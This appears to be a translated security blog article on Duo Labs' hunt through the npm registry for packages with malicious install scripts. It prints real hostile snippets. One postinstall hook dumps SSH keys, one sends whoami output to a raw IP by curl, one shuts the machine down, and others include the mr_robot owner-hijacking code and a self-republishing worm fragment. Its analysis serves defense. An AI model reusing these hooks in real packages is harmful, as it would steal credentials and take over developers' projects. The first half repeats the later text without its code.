Hunting for malicious npm packages
- Transfer
Last week, we talked about how dozens of packages were found in the npm registry that steal data from environment variables. This happened in early August and caused a wave of interest in the security of npm packages. In the comments to the previous article, it was rightly noted that the problem of unreliable packages has existed since the day the package managers appeared, and that although everything is more or less calm now, no one is immune from problems of various scales. For example, malicious code introduced in the next update of some popular package can cause a real catastrophe. Finding dangerous packages is not an easy task; they are approached from different angles. Today we want to share with you a story about how in Duo Labs hunted for malicious npm packages.
The names of recently discovered dangerous packages that steal data from environment variables were calculated so that the developer will allow a typo by entering the name of the known package when the command is run
The danger of installing such packages is that secret keys or other important information is often stored in environment variables. If the administrator accidentally installs such a package, everything of value will be collected and sent to the attacker. And, in this particular attack, malicious packages were published as dependent on real packages with similar names, as a result, the necessary package will be installed, and the developer will most likely not notice anything suspicious.
Considering that npm has some history of combating malicious code - either with hacked regular packages, or with initially designed to perform some unwanted actions, we decided to analyze the entire npm repository and hunt for other malicious packages.
The recent hype surrounding malicious packages in the npm repository is far from the first such incident. In 2016, a developer canceled the publication of his npm packages in response to a name dispute. Many other packages depended on them, as a result of the cancellation of the publication, it led to a widespread disruption of work and to fears related to possible hacking of packages.
Here is the material that was published this year. Here, the researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages). He either hacked weak passwords for accounts by brute force or used passwords obtained after hacking services that are not directly related to npm. This led to massive password dumps in npm.
The possible negative impact of hacked or malicious packages is compounded by the way the npm registry is structured. Namely, npm welcomes the development of small packages that depend on many other packages. This approach has led to the emergence of a whole network of small packages, each of which depends on many others. In the case of the aforementioned study on the possibility of identity theft, the author was able to access some very popular packages, which gave him the potential to conduct a much larger attack on the npm ecosystem than would be possible if there weren’t such a strong package interdependence in npm .
For example, here is a dependency graph for the top 100 npm packages prepared by GraphCommons .
The dependency graph of npm packages from the first hundred
In the above cases of attacks on npm, ordinary developers who did not have malicious intent participated. But what if something like this is organized by an attacker? How can he take advantage of access to other people's packages for personal gain?
The easiest way to carry out the attack, using the ability to run npm scripts
This feature alone is useful. In fact, such scripts are often used as an aid in the presence of complex package installation configurations. However, they do give an attacker access to packages that are hacked or initially malicious. In fact, this allows hacking systems.
Given all this, we analyze the npm registry in order to detect potentially dangerous packages.
The first step in our analysis was to obtain package information. The npm registry is based on CouchDB ( registry.npmjs.com ) There was an endpoint
We, for our purposes, may refer to a copy of the registry at replicate.npmjs.com . We apply the same technique that other libraries use to obtain a copy of JSON data for each package:
Then we will use the JSON processing tool
In order to simplify the analysis, we whipped up a Python script to solve the following problems:
Packages demonstrating the possibility of an attack
Developers have long been aware of the potential dangers of installation scripts. One of our first discoveries was packages that aim to demonstrate this problem in what seems to be a safe way. Here is a summary of the packages:
Scripts of curious developers
The next thing we found were scripts that track the installation location of the package. Npm provides some download data on the package page, but some authors want more. And this is a violation of user privacy. Here are some packages that use Google Analytics or Piwik to track installations.
Similar things in some packages are not so obvious. Data collection scripts are hidden in the JavaScript installation files instead of being embedded in shell commands in the file
Here are some of the similar packages we found. Links lead to the corresponding scripts:
Malicious scripts
And finally, we started looking for packages whose installation scripts are malicious in nature. When installing such packages, the user's system will be exposed to very undesirable effects.
Case mr_robot
While examining the remaining packages, we came across an interesting installation script in the package
Here is the corresponding code snippet. The full text of the function can be viewed here .
First, the script uses the command
This author also published the following packages containing the same backdoor:
Modification and publication of local packages
Another malicious script that we discovered contains code that, in many ways, is similar to what was in the packages
The installation script
The full source can be found here .
Although this is just a package that proves the possibility of such an attack, the exact same approach can be easily used to attack local packages owned by the user performing the installation.
It is important to note that the above is possible not only in the npm repository. This is characteristic of most, if not all, package managers. Managers allow those who write and publish packages to specify the commands that are invoked when installing packages. Perhaps, for npm, this problem is more noticeable due to the package dependency structure that we talked about above.
In addition to this, it is important to note that we have a problem that is very difficult to solve. Static analysis of published npm packages is a difficult task. So complex that there are entire companies that do this.
In addition, there are reports from npm developers that suggest that efforts are being made to use various metrics to prevent users from downloading malicious packages. Take a look, for example, at this Twitter chat.
Meanwhile, it is recommended that you continue to exercise caution when adding dependencies to projects. In addition to minimizing the number of dependencies, we recommend that you use strict versioning and integrity checking of all dependencies, which can be done using yarn built-in tools or a command
Dear readers! Do you protect your systems and Node.js projects from malicious npm packages? If so, please tell us how you do it.
A few words about dangerous packages
The names of recently discovered dangerous packages that steal data from environment variables were calculated so that the developer will allow a typo by entering the name of the known package when the command is run
npm install
. The danger of installing such packages is that secret keys or other important information is often stored in environment variables. If the administrator accidentally installs such a package, everything of value will be collected and sent to the attacker. And, in this particular attack, malicious packages were published as dependent on real packages with similar names, as a result, the necessary package will be installed, and the developer will most likely not notice anything suspicious.
Considering that npm has some history of combating malicious code - either with hacked regular packages, or with initially designed to perform some unwanted actions, we decided to analyze the entire npm repository and hunt for other malicious packages.
Npm trouble story
The recent hype surrounding malicious packages in the npm repository is far from the first such incident. In 2016, a developer canceled the publication of his npm packages in response to a name dispute. Many other packages depended on them, as a result of the cancellation of the publication, it led to a widespread disruption of work and to fears related to possible hacking of packages.
Here is the material that was published this year. Here, the researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages). He either hacked weak passwords for accounts by brute force or used passwords obtained after hacking services that are not directly related to npm. This led to massive password dumps in npm.
The possible negative impact of hacked or malicious packages is compounded by the way the npm registry is structured. Namely, npm welcomes the development of small packages that depend on many other packages. This approach has led to the emergence of a whole network of small packages, each of which depends on many others. In the case of the aforementioned study on the possibility of identity theft, the author was able to access some very popular packages, which gave him the potential to conduct a much larger attack on the npm ecosystem than would be possible if there weren’t such a strong package interdependence in npm .
For example, here is a dependency graph for the top 100 npm packages prepared by GraphCommons .
The dependency graph of npm packages from the first hundred
How malicious npm packages take over systems
In the above cases of attacks on npm, ordinary developers who did not have malicious intent participated. But what if something like this is organized by an attacker? How can he take advantage of access to other people's packages for personal gain?
The easiest way to carry out the attack, using the ability to run npm scripts
preinstall
and postinstall
. This is how the recently discovered malicious packages were organized. In these scripts there may be arbitrary system commands specified in the package file package.json
, designed to be executed, respectively, before and after installing the package. Please note: commands in scripts can be any .This feature alone is useful. In fact, such scripts are often used as an aid in the presence of complex package installation configurations. However, they do give an attacker access to packages that are hacked or initially malicious. In fact, this allows hacking systems.
Given all this, we analyze the npm registry in order to detect potentially dangerous packages.
Hunt for Malicious Packages
▍Download data for analysis
The first step in our analysis was to obtain package information. The npm registry is based on CouchDB ( registry.npmjs.com ) There was an endpoint
/-/all
that returned information on all packages in JSON, all this worked until this feature was disabled . We, for our purposes, may refer to a copy of the registry at replicate.npmjs.com . We apply the same technique that other libraries use to obtain a copy of JSON data for each package:
curl https://replicate.npmjs.com/registry/_design/scratch/_view/byField > npm.json
Then we will use the JSON processing tool
jq
and extract the package names, scripts and URLs from the received data for download. This will help us with such a neat one-liner:cat npm.json | jq '[.rows | to_entries[] | .value | objects | {"name": .value.name, "scripts": .value.scripts, "tarball": .value.dist.tarball}]' > npm_scripts.json
In order to simplify the analysis, we whipped up a Python script to solve the following problems:
- Search for packages with scripts
preinstall
,postinstall
orinstall
. - Search for files executed by a script.
- Search strings for files that may indicate suspicious activity.
▍Find
Packages demonstrating the possibility of an attack
Developers have long been aware of the potential dangers of installation scripts. One of our first discoveries was packages that aim to demonstrate this problem in what seems to be a safe way. Here is a summary of the packages:
{
"name": "maybemaliciouspackage",
"scripts": {
"postinstall": "find ~/.ssh | xargs cat || true && echo '\n\n\n\n\n\nOH HEY LOOK SSH KEYS\n\n\n\n\n\n\n'"
}
},
{
"name": "deasyncp",
"scripts": {
"preinstall": "say U WOT M8; shutdown -s now"
}
},
{
"name": "harmlesspackage",
"scripts": {
"postinstall": "echo '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThanks for your SSH keys :)' && curl -X GET http://104.131.21.155:8043/\\?$(whoami)"
}
},
{
"name": "npm-exploit",
"scripts": {
"install": "mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx"
}
}
Scripts of curious developers
The next thing we found were scripts that track the installation location of the package. Npm provides some download data on the package page, but some authors want more. And this is a violation of user privacy. Here are some packages that use Google Analytics or Piwik to track installations.
{
"name": "npm_scripts_test_metrics",
"scripts": {
"preinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=UA-80316857-2&cid=fab8da3e-d191-4637-a138-f7fdf0444736&ec=Pre%20Install&ea=run'",
"postinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=UA-80316857-2&cid=fab8da3e-d191-4637-a138-f7fdf0444736&ec=Post%20Install&ea=run'"
}
},
{
"name": "subtitles-lib",
"scripts": {
"postinstall": "bash -c 'curl \"http://avighier.piwikpro.com/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'"
}
}
Similar things in some packages are not so obvious. Data collection scripts are hidden in the JavaScript installation files instead of being embedded in shell commands in the file
package.json
. Here are some of the similar packages we found. Links lead to the corresponding scripts:
Malicious scripts
And finally, we started looking for packages whose installation scripts are malicious in nature. When installing such packages, the user's system will be exposed to very undesirable effects.
Case mr_robot
While examining the remaining packages, we came across an interesting installation script in the package
shrugging-logging
. It is arranged very simply. The package adds a set of ASCII characters ¯_(ツ)_/¯
(the so-called shrug - a shrugging emoticon) to the log messages. However, this package has a very unpleasant script postinstall
that gives the author of the package ( mr_robot
) the rights to manage npm packages owned by the one who launched it npm install
. Here is the corresponding code snippet. The full text of the function can be viewed here .
function currentUser(cb) {
exec('npm whoami', function (err, stdout, stderr) {
if (!err) cb(stdout);
});
}
function addOwner(packageName, newOwner) {
exec('npm owner add ' + newOwner + ' ' + packageName);
}
function getModulesOwned(user, cb) {
var url = 'https://www.npmjs.org/~' + user;
request(url, function (error, response, body) {
var $ = cheerio.load(body);
var packages = $('.collaborated-packages a').map(function (i, el) {
return $(this).text();
}).get();
cb(packages);
});
}
currentUser(function (user) {
if (user) {
getModulesOwned(user, function (modules) {
modules.forEach(function (moduleName) {
addOwner(moduleName, 'mr_robot');
});
});
}
});
First, the script uses the command
npm whoami
in order to get the name of the current user. He then looks for packages belonging to this user on npmjs.org . As a result, the script uses the command npm owner add
to add mr_robot
to the number of owners of all these packages. This author also published the following packages containing the same backdoor:
test-module-a
pandora-doomsday
Modification and publication of local packages
Another malicious script that we discovered contains code that, in many ways, is similar to what was in the packages
mr_robot
, however, it has another ace in its sleeve. Instead of simply modifying the list of owners of npm packages, the module sdfjghlkfjdshlkjdhsfg
shows evidence of the possibility of infection and the publication of local packages. The installation script
sdfjghlkfjdshlkjdhsfg
shows this process by the example of modifying and publishing itself:function infectModule (moduleName) {
installModule(moduleName)
.then(() => {
addScript(moduleName);
copyScript(moduleName);
return incrementPatchVersion(moduleName);
})
.then(() => publishInfectedModule(moduleName))
.catch(() => {});
}
const MODULE_NAME = "sdfjghlkfjdshlkjdhsfg";
infectModule(MODULE_NAME);
The full source can be found here .
Although this is just a package that proves the possibility of such an attack, the exact same approach can be easily used to attack local packages owned by the user performing the installation.
Summary
It is important to note that the above is possible not only in the npm repository. This is characteristic of most, if not all, package managers. Managers allow those who write and publish packages to specify the commands that are invoked when installing packages. Perhaps, for npm, this problem is more noticeable due to the package dependency structure that we talked about above.
In addition to this, it is important to note that we have a problem that is very difficult to solve. Static analysis of published npm packages is a difficult task. So complex that there are entire companies that do this.
In addition, there are reports from npm developers that suggest that efforts are being made to use various metrics to prevent users from downloading malicious packages. Take a look, for example, at this Twitter chat.
Meanwhile, it is recommended that you continue to exercise caution when adding dependencies to projects. In addition to minimizing the number of dependencies, we recommend that you use strict versioning and integrity checking of all dependencies, which can be done using yarn built-in tools or a command
npm shrinkwrap
. This simple trick will give the developer confidence that the code that was used during development will get into the production.Dear readers! Do you protect your systems and Node.js projects from malicious npm packages? If so, please tell us how you do it.